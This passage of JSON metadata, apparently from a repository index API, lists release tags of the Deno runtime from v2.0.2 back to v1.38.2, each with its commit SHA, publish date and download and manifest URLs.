om/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"